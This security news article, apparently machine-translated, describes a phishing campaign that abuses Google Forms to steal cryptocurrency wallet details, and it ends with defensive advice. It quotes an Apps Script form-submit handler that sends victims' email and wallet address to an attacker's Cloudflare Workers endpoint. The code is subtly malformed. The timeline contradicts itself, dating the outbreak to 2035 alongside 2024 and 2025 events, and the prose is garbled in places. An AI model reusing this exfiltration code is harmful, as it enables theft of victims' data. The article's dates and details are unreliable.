Google Forms was a popular survey tool because it was easy to use and free, but now hackers are taking advantage of the platform’s reputation to launch large-scale cryptocurrency fraud campaigns. They exploit social engineering to steal electronic wallet information and appropriate property.

2.png

Sophisticated phishing campaign to forge a trading floor

The campaign was discovered in late 2024 but only actually broke out in the second quarter of 2035. Everything begins with an unexpected email containing forms.gle links that are legally formal and easily bypass most spam filters. When the victims opened the link, they were taken to a Google Forms form that forged a well-known cryptocurrency exchange, with notices of a payment of 1,275 BTC pending.

If the user continues to follow the instructions, they will be sent to a fake withdrawal gate, which requires verification of the wallet address and payment of a small network fee. The input information is immediately transferred to the C2 control server which is anonymous behind the Cloudflare Workers infrastructure. The transfer fee will go straight to the mixer’s wallet, completely removing the trail of the transaction.

Leverage Google infrastructure to bypass the mail filter

One of the factors that helped this scam campaign achieve unusually high success rates was taking advantage of Google’s own infrastructure to distribute email. In particular, all impersonation letters are sent via Google’s own SMTP server, which uses the google.com domain with valid SPF, DKIM, and DMARC authentication. This makes most spam filters and domain reputation check systems consider these emails legitimate, allowing them to go straight to the inbox rather than being labeled malicious or relegated to spam.

Not only was the campaign able to overcome technical censorship, it also exploited the user’s existing trust in Google. Forms.gle links not only look familiar, but are also considered safe by URL scanners, making them easy to fool and click without suspicion.

In July 2025, Google Forms – based phishing attacks increased by 63% compared to the previous months’ average, according to Kaspersky. Experts rated it as one of the most effective social engineering scam campaigns of the year. While not using malware or exploiting complex vulnerabilities, the exploitation of legitimate tools and a reputation for domain names has made it easier for hackers to overcome traditional protections.

Attack mechanism: Gather information via WebHook and JavaScript malicious code

A key part of the information stealing process is the script code attached to the Google Forms. Hackers use Apps Script WebHook, a legitimate feature in the Google Workspace ecosystem, to secretly collect data as soon as users click the “Submit” button. This seemingly harmless act actually triggers the process of sending the victim’s wallet and email information to a C2 control server located behind the Cloudflare Workers anonymous layer.

Not only does the form embed a JavaScript redirect at a time, it automatically navigates the browser to a pseudo website with hxxps address://claim-btc-id [.]online. It is a sophisticatedly designed clone, which uses a sleek React interface to make it feel professional and integrates a Flask backend that serves as a proxy. Any interactions here will be transmitted in the background to the attacker’s server.

A code leak from a form form shows how information is mined immediately after submission:

Code:
function onFormSubmit(e){
  const payload = JSON.stringify({
    email: e.namedValues['Email'] [0],
    wallet: e.namedValues['Wallet Address'] [0]
  });
  URLFetchApp.fetch ('https://worker-cryptodrip.workers.dev/submit', {
    method: 'post',
    content Type: 'application/json',
    Payload: payload
  });
}

This script looks valid in the Google form environment, but it’s actually a mechanism for transferring data directly to the hacker’s control system, leaving absolutely no warning or unusual signs on the user interface. When combined with the promising “BTC reward,” the campaign hit greed and a lack of vigilance, causing victims to lose money after a few clicks.

Preventive measures

In the face of the rising abuse of Google Forms in fraudulent campaigns, Kaspersky recommends that organizations deploy a multi-tiered defense strategy, including:

  • Set up content control policy for emails containing Google Forms, apply the default quarantine mode unless the source has been white-listed and authenticated explicitly
  • Install a secure browser add-on capable of blocking requests outbound to unknown domains on Cloudflare Workers platform, which is commonly used by hackers to anonymize C2 control servers
  • The organization provides staff with cybersecurity awareness training, highlighting basic principles such as “never have free cryptocurrency through an online form alone”

The campaign showed a serious level of risk when legitimate platforms were misused by hackers, turning mainstream tools into sophisticated channel for deceptive dispersal. It is also clear that social engineering has always been one of the most deadly weapons of cybercrime. Not requiring high – tech, not requiring infrastructure attacks, just by forgery manipulation and compelling promises, the attacker can get users to voluntarily hand over their digital assets in a matter of a few clicks.

Cyber Security News